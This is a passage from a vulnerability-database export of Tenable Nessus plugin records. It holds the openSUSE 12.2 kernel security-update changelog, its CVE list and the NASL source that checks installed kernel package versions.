reference:\"kernel-xen-debugsource-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-xen-devel-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-xen-devel-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-debug-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-debug-base-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-debug-base-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-debug-debugsource-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-debug-devel-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-desktop-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-desktop-base-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-desktop-base-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-desktop-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-desktop-debugsource-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-desktop-devel-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-desktop-devel-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-base-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-base-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-debugsource-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-devel-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-devel-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-extra-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-ec2-extra-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-pae-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-pae-base-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-pae-base-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-pae-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-pae-debugsource-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-pae-devel-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-pae-devel-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-trace-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-trace-base-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-trace-base-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-trace-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-trace-debugsource-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-trace-devel-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-trace-devel-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-vanilla-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-vanilla-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-vanilla-debugsource-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-vanilla-devel-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-vanilla-devel-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-xen-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.4.33-2.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"x86_64\", reference:\"kernel-xen-devel-debuginfo-3.4.33-2.24.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:26:37", "description": "Linux kernel was updated to kernel 3.4.42 fixing various bugs and\nsecurity issues.\n\n - Refresh patches.suse/SUSE-bootsplash. Fix bootsplash\n breakage due to stable fix (bnc#813963)\n\n - Linux 3.4.39.\n\n - kABI: protect struct tracer.\n\n - Linux 3.4.38 (bnc#808829,CVE-2013-0913).\n\n - patches.kabi/kabi-protect-struct-sk_buff.patch: kABI:\n protect struct sk_buff.\n\n - patches.kabi/kabi-ipv4-remove-inclusion.patch: kABI:\n ipv4, remove inclusion.\n\n - USB: io_ti: Fix NULL dereference in chase_port()\n (bnc#806976, CVE-2013-1774).\n\n - Linux 3.4.37 (bnc#809155 bnc#809330 bnc#809748\n CVE-2013-1848).\n\n - Linux 3.4.36.\n\n - KVM: Convert MSR_KVM_SYSTEM_TIME to use\n gfn_to_hva_cache_init (bnc#806980 CVE-2013-1797).\n\n - KVM: Fix bounds checking in ioapic indirect register\n read (bnc#806980 CVE-2013-1798).\n\n - KVM: Fix for buffer overflow in handling of\n MSR_KVM_SYSTEM_TIME (bnc#806980 CVE-2013-1796).\n\n - kabi/severities: Allow kvm abi changes - kvm modules are\n self consistent\n\n - loopdev: fix a deadlock (bnc#809748).\n\n - block: use i_size_write() in bd_set_size() (bnc#809748).\n\n - drm/i915: bounds check execbuffer relocation count\n (bnc#808829,CVE-2013-0913).\n\n - TTY: do not reset master's packet mode (bnc#809330).\n\n - Update patches.fixes/ext3-Fix-format-string-issues.patch\n (bnc#809155 CVE-2013-1848).\n\n - ext3: Fix format string issues (bnc#809155).\n\n - Linux 3.4.35 (bnc#802153).\n\n - Linux 3.4.34 (CVE-2013-1763 CVE-2013-1767 bnc#792500\n bnc#806138 bnc#805633).\n\n - tmpfs: fix use-after-free of mempolicy object\n (bnc#806138, CVE-2013-1767).", "edition": 20, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : kernel (openSUSE-SU-2013:0824-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1797", "CVE-2013-1767", "CVE-2013-1848", "CVE-2013-1763", "CVE-2013-1774", "CVE-2013-0913", "CVE-2013-1796", "CVE-2013-1798"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:kernel-source", "p-cpe:/a:novell:opensuse:kernel-source-vanilla", "p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource", "p-cpe:/a:novell:opensuse:kernel-debug-debuginfo", "p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo", "p-cpe:/a:novell:opensuse:kernel-ec2-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default-debugsource", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-trace", "p-cpe:/a:novell:opensuse:kernel-ec2-base", "p-cpe:/a:novell:opensuse:kernel-ec2", "p-cpe:/a:novell:opensuse:kernel-trace-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-debugsource", "p-cpe:/a:novell:opensuse:kernel-xen-devel", "p-cpe:/a:novell:opensuse:kernel-trace-base", "p-cpe:/a:novell:opensuse:kernel-default-debuginfo", "p-cpe:/a:novell:opensuse:kernel-ec2-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop-debuginfo", "p-cpe:/a:novell:opensuse:kernel-ec2-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-xen-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop-base", "p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-xen-base", "p-cpe:/a:novell:opensuse:kernel-default-devel", "p-cpe:/a:novell:opensuse:kernel-devel", "p-cpe:/a:novell:opensuse:kernel-ec2-debugsource", "p-cpe:/a:novell:opensuse:kernel-pae", "p-cpe:/a:novell:opensuse:kernel-ec2-extra-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-devel", "p-cpe:/a:novell:opensuse:kernel-syms", "p-cpe:/a:novell:opensuse:kernel-pae-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-base", "p-cpe:/a:novell:opensuse:kernel-vanilla", "p-cpe:/a:novell:opensuse:kernel-xen", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel", "p-cpe:/a:novell:opensuse:kernel-debug-base", "p-cpe:/a:novell:opensuse:kernel-xen-debugsource", "p-cpe:/a:novell:opensuse:kernel-trace-devel", "p-cpe:/a:novell:opensuse:kernel-trace-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-debugsource", "p-cpe:/a:novell:opensuse:kernel-desktop-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default", "p-cpe:/a:novell:opensuse:kernel-ec2-devel", "p-cpe:/a:novell:opensuse:kernel-ec2-extra", "p-cpe:/a:novell:opensuse:kernel-trace-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-devel", "p-cpe:/a:novell:opensuse:kernel-desktop-devel", "p-cpe:/a:novell:opensuse:kernel-xen-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-xen-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop", "p-cpe:/a:novell:opensuse:kernel-debug", "p-cpe:/a:novell:opensuse:kernel-trace-debugsource", "p-cpe:/a:novell:opensuse:kernel-default-base", "cpe:/o:novell:opensuse:12.2", "p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-desktop-debugsource", "p-cpe:/a:novell:opensuse:kernel-default-devel-debuginfo"], "id": "OPENSUSE-2013-440.NASL", "href": "https://www.tenable.com/plugins/nessus/75012", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-440.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75012);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-0913\", \"CVE-2013-1763\", \"CVE-2013-1767\", \"CVE-2013-1774\", \"CVE-2013-1796\", \"CVE-2013-1797\", \"CVE-2013-1798\", \"CVE-2013-1848\");\n\n script_name(english:\"openSUSE Security Update : kernel (openSUSE-SU-2013:0824-1)\");\n script_summary(english:\"Check for the openSUSE-2013-440 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Linux kernel was updated to kernel 3.4.42 fixing various bugs and\nsecurity issues.\n\n - Refresh patches.suse/SUSE-bootsplash. Fix bootsplash\n breakage due to stable fix (bnc#813963)\n\n - Linux 3.4.39.\n\n - kABI: protect struct tracer.\n\n - Linux 3.4.38 (bnc#808829,CVE-2013-0913).\n\n - patches.kabi/kabi-protect-struct-sk_buff.patch: kABI:\n protect struct sk_buff.\n\n - patches.kabi/kabi-ipv4-remove-inclusion.patch: kABI:\n ipv4, remove inclusion.\n\n - USB: io_ti: Fix NULL dereference in chase_port()\n (bnc#806976, CVE-2013-1774).\n\n - Linux 3.4.37 (bnc#809155 bnc#809330 bnc#809748\n CVE-2013-1848).\n\n - Linux 3.4.36.\n\n - KVM: Convert MSR_KVM_SYSTEM_TIME to use\n gfn_to_hva_cache_init (bnc#806980 CVE-2013-1797).\n\n - KVM: Fix bounds checking in ioapic indirect register\n read (bnc#806980 CVE-2013-1798).\n\n - KVM: Fix for buffer overflow in handling of\n MSR_KVM_SYSTEM_TIME (bnc#806980 CVE-2013-1796).\n\n - kabi/severities: Allow kvm abi changes - kvm modules are\n self consistent\n\n - loopdev: fix a deadlock (bnc#809748).\n\n - block: use i_size_write() in bd_set_size() (bnc#809748).\n\n - drm/i915: bounds check execbuffer relocation count\n (bnc#808829,CVE-2013-0913).\n\n - TTY: do not reset master's packet mode (bnc#809330).\n\n - Update patches.fixes/ext3-Fix-format-string-issues.patch\n (bnc#809155 CVE-2013-1848).\n\n - ext3: Fix format string issues (bnc#809155).\n\n - Linux 3.4.35 (bnc#802153).\n\n - Linux 3.4.34 (CVE-2013-1763 CVE-2013-1767 bnc#792500\n bnc#806138 bnc#805633).\n\n - tmpfs: fix use-after-free of mempolicy object\n (bnc#806138, CVE-2013-1767).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=792500\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=802153\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=805633\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=806138\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=806976\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=806980\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=808829\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=809155\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=809330\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=809748\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=813963\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-05/msg00030.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-default-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-default-base-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-default-base-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-default-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-default-debugsource-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-default-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-default-devel-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-source-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-source-vanilla-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"kernel-syms-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-debug-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-debug-base-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-debug-base-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-debug-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-debug-debugsource-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-debug-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-debug-devel-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-desktop-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-desktop-base-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-desktop-base-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-desktop-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-desktop-debugsource-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-desktop-devel-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", reference:\"kernel-desktop-devel-debuginfo-3.4.42-2.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", cpu:\"i686\", 